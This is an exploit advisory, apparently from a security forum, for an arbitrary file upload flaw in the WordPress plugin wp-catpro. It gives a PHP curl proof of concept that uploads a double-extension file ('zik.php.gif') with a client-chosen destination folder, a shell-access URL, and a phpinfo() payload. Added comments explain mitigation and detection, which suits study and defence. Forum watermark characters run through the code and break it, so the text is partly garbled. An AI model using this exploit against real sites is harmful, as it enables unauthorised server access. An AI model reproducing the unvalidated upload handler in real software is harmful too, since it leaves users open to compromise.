WordPress plugin wp-catpro - Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
J" S- Y6 ~' B2 ]------------------
$ l+ f! r3 c$ o$ p. D8 A
9 r$ G; x% ?* Z! ]" k3 M1 l- i" [#=> Exploit
% m! u. @5 b( u3 M-----------
! o0 h3 n/ {) H/ H<?php
# Advisory proof-of-concept, kept verbatim (forum watermark characters included,
# so this block is not parseable as pasted).
# What it shows: a single multipart POST to the plugin's bundled SWFUpload handler,
# carrying a file whose last extension is in the allow-list quoted above.
# Defensive reading:
#  - Mitigation: derive the destination directory server-side rather than from the
#    request, validate the whole filename (not only its final extension), rename the
#    file on store, and make sure nothing under wp-content/uploads is served as PHP.
#  - Detection: POSTs to */wp-content/plugins/wp-catpro/js/swfupload/js/upload.php,
#    and new files with stacked extensions (*.php.*) under wp-content/uploads/catpro/.
# z: @7 Z+ _. }3 S/ H! @ $ A' c3 F) ^$ }3 r1 c. _6 Y" `4 Z
# Double extension: the name ends in .gif, which the allow-list above accepts.
$uploadfile="zik.php.gif";
# Target is the plugin's bundled upload handler; [ www.2cto.com ] and [path] are the
# advisory's placeholders, not real hosts.
: d, d0 E9 t1 _7 R- q' L6 L+ ~$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
2 i2 f, M/ q7 c7 ocurl_setopt($ch, CURLOPT_POST, true);
. U9 [) T# z/ k& l% }& W6 @$ Kcurl_setopt($ch, CURLOPT_POSTFIELDS,
# Two fields: the file itself ('Filedata') and a client-chosen destination
# directory ('folder'). The "Shell Access" line further down implies the handler
# uses the supplied folder unchanged; a hardened handler ignores this field.
* m! J6 j+ J3 X* \- K- h2 e6 [( [array('Filedata'=>"@$uploadfile",1 n) e2 Q" D4 N3 j3 W% b
'folder'=>'/wp-content/uploads/catpro/'));
8 d9 D5 Q3 U6 L: `0 c% pcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
) K4 j/ B4 B" k: M2 p7 V, J4 O$postResult = curl_exec($ch);6 o9 X3 l5 U# b
curl_close($ch);' ^; o# s0 } o
# Prints the handler's raw response; no success check is done.
( w1 F8 B0 c/ t: B+ l# gprint "$postResult";/ \# B# S, F/ _1 k* l0 c; W( A
3 h h2 P! _: f6 C2 u2 w/ m
# NOTE(review): the next line is prose inside the PHP tags (a parse error as
# pasted). It is the advisory's claim of where the upload lands; whether a
# *.php.gif file is executed by the web server depends on that server's handler
# configuration, which this page does not establish.
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif9 I2 W n9 ?1 g, c! \0 M3 y7 a
?>
/ t( [* ?3 n9 W$ i<?php
# Content of the uploaded file in the advisory: phpinfo() only, i.e. an
# information-disclosure page rather than a command shell. On a hardened host a
# file under the uploads directory is never served as PHP; phpinfo() output
# returned from an uploads path is a reasonable detection signal.
6 x8 }$ o d; h: i# Bphpinfo();+ l+ W: H5 o- u5 G' Z
?> |